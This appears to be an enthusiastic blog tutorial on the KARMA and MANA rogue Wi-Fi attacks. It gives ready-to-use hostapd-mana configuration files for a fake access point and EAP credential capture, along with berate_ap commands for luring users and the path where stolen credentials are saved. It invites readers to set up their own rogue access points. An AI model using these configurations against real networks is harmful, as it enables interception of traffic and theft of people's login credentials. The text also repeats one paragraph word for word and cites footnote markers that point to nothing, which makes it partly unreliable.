The MANA Attack: A Rogue Wi-Fi Adventure

Introduction

In the realm of Wi-Fi security, two intriguing attacks stand out: the MANA attack and the KARMA attack. Let’s delve into their mechanics and explore how the hostapd-mana tool enables these exploits.

KARMA Attack

The KARMA attack exploits a behavior exhibited by some Wi-Fi devices, coupled with the absence of access point authentication in various Wi-Fi protocols. It’s essentially a variant of the evil twin attack. Here’s how it works:

  1. Preferred Network List (PNL): Vulnerable client devices broadcast a PNL containing the SSIDs of access points they’ve previously connected to. These SSIDs are ones the client is willing to automatically reconnect to without user intervention.

  2. Exploiting the PNL: The KARMA attack involves an access point receiving this PNL and masquerading as an evil twin of a trusted access point. If the malicious access point’s signal is stronger than that of the genuine access point, and the client doesn’t attempt to authenticate, the attack succeeds.

  3. Man-in-the-Middle (MITM): Once successful, the malicious access point becomes a man-in-the-middle, positioning it to launch further attacks against the victim device¹.

MANA Attack

Now, let’s meet the MANA attack. Unlike KARMA, MANA doesn’t target access point credentials directly. Instead, it operates more like a MITM attack. Here’s what makes it fascinating:

  1. Rogue Access Points: MANA creates rogue access points that trick users into connecting. These rogue APs can intercept various EAP (Extensible Authentication Protocol) credentials.

  2. Hostapd-mana: The tool of choice for MANA attacks is hostapd-mana. It’s an enhanced version of the original hostapd. While both can host fake APs, hostapd-mana offers additional features, including dumping passwords obtained from handshakes.

  3. EAP MANA Configuration:

# Basic MANA ATTACK config 
interface=wlan0
ssid=hostapd-mana wifi
channel=6
hw_mode=g
enable_mana=1
mana_loud=1


This configuration sets up a MANA-enabled access point with EAP interception capabilities⁷.

# Common EAP MANA ATTACK configuration
interface=wlan1
ssid=netname
channel=6
hw_mode=g

# WPA configuration
wpa=2
wpa_key_mgmt=WPA-EAP
wpa_pairwise=TKIP CCMP

# EAP server configuration
ieee8021x=1
eapol_key_index_workaround=0
eap_server=1
eap_user_file=netname.eap_user

# Certificate configuration for EAP-TLS/PEAP/TTLS
ca_cert=/root/certs/ca.pem
server_cert=/root/certs/server.pem
private_key=/root/certs/server.key
private_key_passwd=
dh_file=/root/certs/dhparam.pem

# MANA-specific configuration
mana_wpe=1
mana_eapsuccess=1
  1. Orchestrating MANA Attacks: To orchestrate MANA attacks, we use berate_ap. Here are some commands:
    • To trick users into connecting to your access point (default MANA behavior):
      berate_ap --eap --mana wlan0 eth0 MyAccessPoint
    • To enable MANA WPE attacks separately:
      berate_ap --eap --mana-wpe wlan0 eth0 MyAccessPoint
    • Other options include --mana-eapsuccess and --mana-eaptls. The default location for the credential output file is /tmp/hostapd.credout⁶.

Why I Adore MANA

MANA isn’t just about Wi-Fi hacking; it’s an artful dance of deception. While it has limitations (like antenna requirements and dealing with multiple access points), its MITM wireless concept transcends mere Wi-Fi hacking. MANA is my favorite attack by far, and its versatility never ceases to amaze me.

So, next time you’re exploring Wi-Fi security, consider stepping into the world of MANA. It’s a journey worth taking!

Remember, MANA isn’t just about Wi-Fi hacking; it’s an artful dance of deception. While it has limitations (like antenna requirements and dealing with multiple access points), its MITM wireless concept transcends mere Wi-Fi hacking. MANA is my favorite attack by far, and its versatility never ceases to amaze me. ⁸⁹

Feel free to explore the hostapd-mana GitHub repository and start your own rogue AP adventures! 🌐🔍